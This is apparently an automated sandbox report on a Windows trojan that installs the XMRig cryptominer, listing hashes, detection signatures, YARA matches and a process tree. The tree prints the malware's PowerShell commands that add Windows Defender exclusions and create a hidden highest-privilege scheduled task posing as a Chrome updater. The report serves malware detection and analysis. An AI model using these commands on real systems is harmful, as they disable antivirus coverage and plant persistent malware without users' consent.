Edit tour
Windows
Analysis Report
ylVAEHbMLf.exe
Overview
General Information
Sample name: | ylVAEHbMLf.exerenamed because original name is a hash value |
Original sample name: | 3fb477ee2214bf2d4ed7df2d23f159e8.exe |
Analysis ID: | 1528506 |
MD5: | 3fb477ee2214bf2d4ed7df2d23f159e8 |
SHA1: | 836c3f3b4b8f02e495703767b6bf923c453dba36 |
SHA256: | 508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291 |
Tags: | 64exetrojan |
Infos: | |
Detection
Xmrig
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Protects its processes via BreakOnTermination flag
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected PersistenceViaHiddenTask
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- ylVAEHbMLf.exe (PID: 6952 cmdline:
"C:\Users\ user\Deskt op\ylVAEHb MLf.exe" MD5: 3FB477EE2214BF2D4ED7DF2D23F159E8) - dialer.exe (PID: 5796 cmdline:
C:\Windows \System32\ dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93) - winlogon.exe (PID: 552 cmdline:
winlogon.e xe MD5: F8B41A1B3E569E7E6F990567F21DCE97) - lsass.exe (PID: 628 cmdline:
C:\Windows \system32\ lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A) - svchost.exe (PID: 920 cmdline:
C:\Windows \system32\ svchost.ex e -k DcomL aunch -p - s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - dwm.exe (PID: 988 cmdline:
"dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C) - svchost.exe (PID: 364 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s g psvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 356 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 696 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 592 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s TimeBroke rSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1044 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S chedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - updater.exe (PID: 6184 cmdline:
C:\Users\u ser\AppDat a\Roaming\ Google\Chr ome\update r.exe MD5: 3FB477EE2214BF2D4ED7DF2D23F159E8) - dialer.exe (PID: 6252 cmdline:
C:\Windows \System32\ dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93) - svchost.exe (PID: 1572 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s FontCa che MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1652 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s DispBr okerDeskto pSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1724 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p -s NlaS vc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1824 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s netpro fm MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1840 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1940 cmdline:
C:\Windows \system32\ svchost.ex e -k Netwo rkService -p -s Dnsc ache MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1948 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1956 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 2036 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s S hellHWDete ction MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - spoolsv.exe (PID: 1932 cmdline:
C:\Windows \System32\ spoolsv.ex e MD5: 0D4B1E3E4488E9BDC035F23E1F4FE22F) - svchost.exe (PID: 2064 cmdline:
C:\Windows \system32\ svchost.ex e -k appmo del -p -s StateRepos itory MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 2152 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s WinHttpAu toProxySvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 2268 cmdline:
C:\Windows \System32\ svchost.ex e -k Netwo rkService -p -s Lanm anWorkstat ion MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 2388 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s I KEEXT MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1084 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s P rofSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1200 cmdline:
C:\Windows \System32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1252 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s U serManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1296 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s EventS ystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1316 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s T hemes MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1408 cmdline:
C:\Windows \system32\ svchost.ex e -k Local Service -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1488 cmdline:
C:\Windows \system32\ svchost.ex e -k Local ServiceNet workRestri cted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1496 cmdline:
C:\Windows \system32\ svchost.ex e -k netsv cs -p -s S ENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A) - svchost.exe (PID: 1552 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s AudioEndpo intBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- powershell.exe (PID: 7000 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7032 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 3632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 2872 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# lbfytpia#> IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /tn 'HtfsFile Manager' / tr '''C:\U sers\user\ AppData\Ro aming\Goog le\Chrome\ updater.ex e''' } Els e { Regist er-Schedul edTask -Ac tion (New- ScheduledT askAction -Execute ' C:\Users\u ser\AppDat a\Roaming\ Google\Chr ome\update r.exe') -T rigger (Ne w-Schedule dTaskTrigg er -AtLogO n) -Settin gs (New-Sc heduledTas kSettingsS et -AllowS tartIfOnBa tteries -D isallowHar dTerminate -DontStop IfGoingOnB atteries - DontStopOn IdleEnd -E xecutionTi meLimit (N ew-TimeSpa n -Days 10 00)) -Task Name 'Htfs FileManage r' -RunLev el 'Highes t' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 2256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - conhost.exe (PID: 928 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4296 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe Ad d-MpPrefer ence -Excl usionPath @($env:Use rProfile, $env:Progr amFiles) - Force MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6016 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6996 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe <# lbfytpia#> IF([Syste m.Environm ent]::OSVe rsion.Vers ion -lt [S ystem.Vers ion]"6.2") { schtask s /create /f /sc onl ogon /rl h ighest /tn 'HtfsFile Manager' / tr '''C:\U sers\user\ AppData\Ro aming\Goog le\Chrome\ updater.ex e''' } Els e { Regist er-Schedul edTask -Ac tion (New- ScheduledT askAction -Execute ' C:\Users\u ser\AppDat a\Roaming\ Google\Chr ome\update r.exe') -T rigger (Ne w-Schedule dTaskTrigg er -AtLogO n) -Settin gs (New-Sc heduledTas kSettingsS et -AllowS tartIfOnBa tteries -D isallowHar dTerminate -DontStop IfGoingOnB atteries - DontStopOn IdleEnd -E xecutionTi meLimit (N ew-TimeSpa n -Days 10 00)) -Task Name 'Htfs FileManage r' -RunLev el 'Highes t' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 3288 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | ||
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown |
| |
MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth |
| |
MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen |
| |
JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | ||
Click to see the 11 entries |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |